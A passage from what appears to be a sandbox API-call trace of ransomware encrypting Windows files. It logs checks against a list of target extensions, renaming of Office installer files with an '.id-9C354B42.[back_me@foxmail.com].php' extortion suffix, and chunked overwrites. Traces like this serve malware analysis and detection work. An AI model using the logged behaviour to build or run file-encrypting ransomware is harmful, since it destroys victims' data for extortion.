(lpString1=".rar", lpString2=".msi") returned 1 [0036.621] lstrlenW (lpString=".bz2") returned 4 [0036.621] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.621] lstrlenW (lpString=".7z") returned 3 [0036.621] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.621] lstrlenW (lpString=".dbf") returned 4 [0036.621] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.621] lstrlenW (lpString=".1cd") returned 4 [0036.621] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.621] lstrlenW (lpString=".jpg") returned 4 [0036.621] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.621] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0036.622] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0036.622] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.622] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=2513920) returned 1 [0036.622] CloseHandle (hObject=0x1a4) returned 1 [0036.622] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020 [0036.622] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.622] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0036.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.623] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.668] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.668] ReadFile (in: hFile=0x1a4, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.676] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.676] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.676] ReadFile (in: hFile=0x1a4, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.337] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc010c, lpOverlapped=0x0) returned 1 [0037.356] SetEndOfFile (hFile=0x1a4) returned 1 [0037.357] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42dc930 [0037.360] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.360] WriteFile (in: hFile=0x1a4, lpBuffer=0x42dc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42dc930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.362] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.362] WriteFile (in: hFile=0x1a4, lpBuffer=0x42dc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42dc930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.567] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.567] WriteFile (in: hFile=0x1a4, lpBuffer=0x42dc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42dc930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.570] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42dc930 | out: hHeap=0xb10000) returned 1 [0037.573] CloseHandle (hObject=0x1a4) returned 1 [0038.254] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0038.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.255] lstrlenW (lpString=".doc") returned 4 [0038.255] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0038.255] lstrlenW (lpString=".docx") returned 5 [0038.255] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0038.255] lstrlenW (lpString=".pdf") returned 4 [0038.255] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0038.255] lstrlenW (lpString=".xls") returned 4 [0038.255] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0038.255] lstrlenW (lpString=".xlsx") returned 5 [0038.255] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0038.255] lstrlenW (lpString=".ppt") returned 4 [0038.255] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0038.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.255] lstrlenW (lpString=".zip") returned 4 [0038.255] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0038.255] lstrlenW (lpString=".rar") returned 4 [0038.255] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0038.255] lstrlenW (lpString=".bz2") returned 4 [0038.255] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0038.255] lstrlenW (lpString=".7z") returned 3 [0038.255] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0038.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.256] lstrlenW (lpString=".dbf") returned 4 [0038.256] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0038.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.256] lstrlenW (lpString=".1cd") returned 4 [0038.256] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0038.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.256] lstrlenW (lpString=".jpg") returned 4 [0038.256] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0038.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.256] lstrlenW (lpString=".doc") returned 4 [0038.256] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0038.256] lstrlenW (lpString=".docx") returned 5 [0038.256] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0038.256] lstrlenW (lpString=".pdf") returned 4 [0038.256] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0038.256] lstrlenW (lpString=".xls") returned 4 [0038.256] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0038.256] lstrlenW (lpString=".xlsx") returned 5 [0038.256] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0038.256] lstrlenW (lpString=".ppt") returned 4 [0038.256] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0038.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.256] lstrlenW (lpString=".zip") returned 4 [0038.256] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0038.256] lstrlenW (lpString=".rar") returned 4 [0038.256] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0038.256] lstrlenW (lpString=".bz2") returned 4 [0038.256] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0038.256] lstrlenW (lpString=".7z") returned 3 [0038.257] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0038.257] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.257] lstrlenW (lpString=".dbf") returned 4 [0038.257] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0038.257] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.257] lstrlenW (lpString=".1cd") returned 4 [0038.257] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0038.257] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0038.257] lstrlenW (lpString=".jpg") returned 4 [0038.257] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0038.257] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0038.257] lstrlenW (lpString="OutlkLR.cab") returned 11 [0038.257] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.257] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=14819276) returned 1 [0038.257] CloseHandle (hObject=0x1a4) returned 1 [0038.257] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0038.258] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0038.258] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0038.258] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0038.258] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0038.258] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.258] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.516] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.516] ReadFile (in: hFile=0x1a4, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.567] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0038.567] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.567] ReadFile (in: hFile=0x1a4, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.584] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.585] WriteFile (in: hFile=0x1a4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0038.990] SetEndOfFile (hFile=0x1a4) returned 1 [0038.990] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42cc930 [0038.994] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.994] WriteFile (in: hFile=0x1a4, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.995] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.995] WriteFile (in: hFile=0x1a4, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.995] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.995] WriteFile (in: hFile=0x1a4, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.997] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42cc930 | out: hHeap=0xb10000) returned 1 [0038.998] CloseHandle (hObject=0x1a4) returned 1 [0041.164] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0041.164] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.164] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.164] lstrlenW (lpString=".doc") returned 4 [0041.164] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString=".docx") returned 5 [0041.165] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.165] lstrlenW (lpString=".pdf") returned 4 [0041.165] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString=".xls") returned 4 [0041.165] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString=".xlsx") returned 5 [0041.165] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.165] lstrlenW (lpString=".ppt") returned 4 [0041.165] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.165] lstrlenW (lpString=".zip") returned 4 [0041.165] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString=".rar") returned 4 [0041.165] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString=".bz2") returned 4 [0041.165] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.165] lstrlenW (lpString=".7z") returned 3 [0041.165] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.165] lstrlenW (lpString=".dbf") returned 4 [0041.165] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.165] lstrlenW (lpString=".1cd") returned 4 [0041.165] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.165] lstrlenW (lpString=".jpg") returned 4 [0041.165] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.165] lstrlenW (lpString=".doc") returned 4 [0041.165] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.165] lstrlenW (lpString=".docx") returned 5 [0041.166] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.166] lstrlenW (lpString=".pdf") returned 4 [0041.166] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.166] lstrlenW (lpString=".xls") returned 4 [0041.166] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.166] lstrlenW (lpString=".xlsx") returned 5 [0041.166] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.166] lstrlenW (lpString=".ppt") returned 4 [0041.166] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.166] lstrlenW (lpString=".zip") returned 4 [0041.166] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.166] lstrlenW (lpString=".rar") returned 4 [0041.166] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.166] lstrlenW (lpString=".bz2") returned 4 [0041.166] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.166] lstrlenW (lpString=".7z") returned 3 [0041.166] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.166] lstrlenW (lpString=".dbf") returned 4 [0041.166] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.166] lstrlenW (lpString=".1cd") returned 4 [0041.166] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0041.166] lstrlenW (lpString=".jpg") returned 4 [0041.166] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.166] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0041.166] lstrlenW (lpString="Proof.msi") returned 9 [0041.167] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0041.167] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=875520) returned 1 [0041.167] CloseHandle (hObject=0x1a4) returned 1 [0041.167] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020 [0041.167] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.167] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0041.168] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.168] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.168] GetLastError () returned 0x0 [0041.168] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xd5c00, lpOverlapped=0x0) returned 1 [0041.195] WriteFile (in: hFile=0x1f4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xd5c10, lpOverlapped=0x0) returned 1 [0041.511] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.511] WriteFile (in: hFile=0x1f4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.511] SetEndOfFile (hFile=0x1f4) returned 1 [0041.511] CloseHandle (hObject=0x1f4) returned 1 